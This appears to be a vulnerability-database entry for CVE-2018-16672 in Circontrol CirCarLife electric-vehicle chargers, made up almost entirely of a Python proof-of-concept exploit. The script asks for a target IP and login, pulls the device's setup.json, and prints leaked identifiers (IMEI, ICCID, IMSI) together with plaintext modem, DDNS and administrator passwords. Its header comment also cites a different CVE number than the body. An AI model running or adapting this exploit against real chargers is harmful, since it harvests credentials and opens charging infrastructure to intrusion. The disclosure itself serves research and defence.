Circontrol CirCarLife 信息泄露漏洞 (CVE-2018-16672)

#POC for CVE-2018-16670 #More POCs and complete log parser for credentials and system specifications disclosure at https://github.com/SadFud/Exploits/tree/master/Real%20World/SCADA%20-%20IOT%20Systems import requests from requests.auth import HTTPDigestAuth from termcolor import colored import json def lsetup(user, pwd): print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue') r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd)) if r1.text.encode("utf8").find('not granted') != -1: print colored('[-] Error, login failed', 'red') else: respuesta = r1.text.encode("utf8") print colored('[+] Setup information leaked') print colored('[*] Parsing setup file', 'blue') if (len(str(respuesta)) > 5): datos = json.loads(respuesta) print colored('[*] Processing device configuration data: ', 'blue') print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"] print colored('[+] IMEI: ', 'green') + datos["device"]["imei"] print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"] print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"] print colored('[*] Processing network configuration data: ', 'blue') print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"] print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"] print colored('[+] IP address: ', 'green') + datos["network"]["ip"] print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"] print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"] print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"] print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"] print colored('[*] Processing locale options configuration data', 'blue') print colored('[+] Language: ', 'green') + datos["locale"]["language"] print colored('[+] Currency: ', 'green') + datos["locale"]["currency"] print colored('[*] Processing public address configuration data', 'blue') print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"] print colored('[+] Host: ', 'green') + datos["paddress"]["host"] print colored('[*] Processing time configuration data', 'blue') print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"] print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"] print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"] print colored('[*] Processing GPRS modem configuration data', 'blue') print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"] print colored('[+] Username: ', 'green') + datos["modem"]["usr"] print colored('[+] Password: ', 'green') + datos["modem"]["pwd"] print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"]) print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"]) print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"]) print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"]) print colored('[*] Processing DDNS configuration data', 'blue') print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"] print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"] print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"] print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"] print colored('[*] Processing security configuration data', 'blue') print colored('[+] Username: ', 'green') + datos["security"]["user"] print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"]) print colored('[*] Processing services configuration data', 'blue') print colored('[+] iManager', 'green') + str(datos["services"]["imanager"]) print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"]) print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"]) print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"]) print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"]) print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue') else: print colored('[-] Unable to retrieve the setup config file', 'red') url = raw_input('Insert target ip: ') target1 = 'http://' + url + ':80' luser80 = raw_input('Insert username for login at circarlife server: ') lpasswd80 = raw_input('Insert password for login at circarlife server: ') lsetup(luser80.strip(), lpasswd80.strip())